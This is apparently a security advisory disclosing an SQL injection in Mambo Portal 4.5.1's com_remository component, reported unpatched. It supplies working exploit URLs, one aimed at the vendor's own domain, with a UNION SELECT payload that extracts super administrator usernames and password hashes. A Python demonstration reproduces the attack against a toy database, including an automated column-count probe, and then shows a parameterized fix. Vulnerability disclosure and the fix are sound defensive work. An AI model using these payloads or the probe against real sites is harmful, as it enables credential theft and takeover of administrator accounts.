
Mambo Portal latest version 4.5.1 (1.09) and lower versions : SQL injection Vulnerability.



Vendor

www.mamboportal.com 

Message from vendor : Mambo is one of the most powerful Open Source Content Management Systems on the planet. It is used all over the world for everything from simple websites to complex corporate applications. Mambo is easy to install, simple to manage, and reliable. 



Bug name : SQL injection

Version : latest version 4.5.1 (1.0.9) and lower.



Exploit :



http://www.mamboportal.com/index.php?option=com_remository&Itemid=27&func=fileinfo&parent=folder&filecatid=499%20and%201=0[SQL]/*



The "filecatid" parameter is placed unfiltered into the component's SELECT, so usernames and the password column can be pulled from the table "mos_users" with the UNION query below (the "and 1=0" drops the real rows, the 23 selected columns must match the column count of the original SELECT, and the trailing "/*" comments out the rest of the query):



http://www.mambosite.com/index.php?option=com_remository&Itemid=[id]&func=selectfolder&filecatid=[id]%20and%201=0%20union%20all%20select%201,2,3,4,username,6,password,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20from%20mos_users%20where%20usertype=0/*



where the "usertype" value selects the account class (0 returns the super administrator accounts) :

 0 = superadministrator

 1 = administrator

 2 = editor

 3 = user

 5 = publisher

 6 = manager
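The following is an added example, not code from the advisory or from Mambo itself: it reproduces the injection against a constructed SQLite database whose tables only loosely mirror the advisory's "mos_users" and the remository file table (four columns instead of the component's 23; column names, rows and hashes are all assumptions). It shows the vulnerable string-built query, the "and 1=0 union all select ... /*" payload returning the super administrator's username and password column, how the column count that the UNION must match is probed, and the parameterized replacement that rejects the payload.

```python
import sqlite3

# Constructed sample data for illustration only (assumed schema, not Mambo's real one).
# usertype 0 = superadministrator, 2 = editor, following the advisory's mapping.
USERS = [
    (62, "admin", "21232f297a57a5a743894a0e4a801fc3", 0),   # constructed md5 hash
    (63, "editor", "5f4dcc3b5aa765d89d3f4c9b68f9a6f3", 2),  # constructed md5 hash
]
FILES = [
    (10, 499, "readme.txt", 1024),
    (11, 500, "notes.txt", 2048),
]

# The advisory's payload shape, reduced to the four columns of this toy table.
PAYLOAD = "499 and 1=0 union all select 1,username,password,usertype from mos_users where usertype=0/*"


def build_db():
    """In-memory database with an assumed mos_users table and an assumed file table."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE mos_users (id INTEGER, username TEXT, password TEXT, usertype INTEGER)")
    con.executemany("INSERT INTO mos_users VALUES (?,?,?,?)", USERS)
    con.execute("CREATE TABLE files (id INTEGER, filecatid INTEGER, filetitle TEXT, filesize INTEGER)")
    con.executemany("INSERT INTO files VALUES (?,?,?,?)", FILES)
    con.commit()
    return con


def vulnerable_fileinfo(con, filecatid):
    """The bug: the request parameter is concatenated straight into the SQL text."""
    sql = (
        "SELECT id, filecatid, filetitle, filesize FROM files "
        f"WHERE filecatid={filecatid} ORDER BY id"
    )
    # The trailing /* in the payload swallows ' ORDER BY id', which SQLite
    # (like MySQL) accepts as an unterminated comment.
    return con.execute(sql).fetchall()


def probe_column_count(con, max_cols=30):
    """How the '23' in the advisory's URL is found: widen the UNION until the
    database stops complaining about mismatched column counts."""
    for n in range(1, max_cols + 1):
        cols = ",".join(str(i) for i in range(1, n + 1))
        try:
            vulnerable_fileinfo(con, f"499 and 1=0 union all select {cols}/*")
            return n
        except sqlite3.OperationalError:
            continue
    return None


def safe_fileinfo(con, filecatid):
    """The fix: validate the type the parameter is supposed to have and bind it,
    so its value can never become SQL syntax."""
    try:
        cat = int(filecatid)
    except (TypeError, ValueError):
        raise ValueError("filecatid must be an integer")
    sql = "SELECT id, filecatid, filetitle, filesize FROM files WHERE filecatid=? ORDER BY id"
    return con.execute(sql, (cat,)).fetchall()


if __name__ == "__main__":
    db = build_db()
    print("normal request :", vulnerable_fileinfo(db, "499"))
    print("column count   :", probe_column_count(db))
    print("injected rows  :", vulnerable_fileinfo(db, PAYLOAD))
    try:
        safe_fileinfo(db, PAYLOAD)
    except ValueError as err:
        print("hardened query :", err)
```

The injected row comes back through the columns the legitimate query was meant to display, which is why the real payload puts username and password into positions 5 and 7 of the 23: those are the positions the remository page prints.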



Vendor feedback :

Not yet



Vendor patch :

Not yet



khoai

www.xfrog.org 
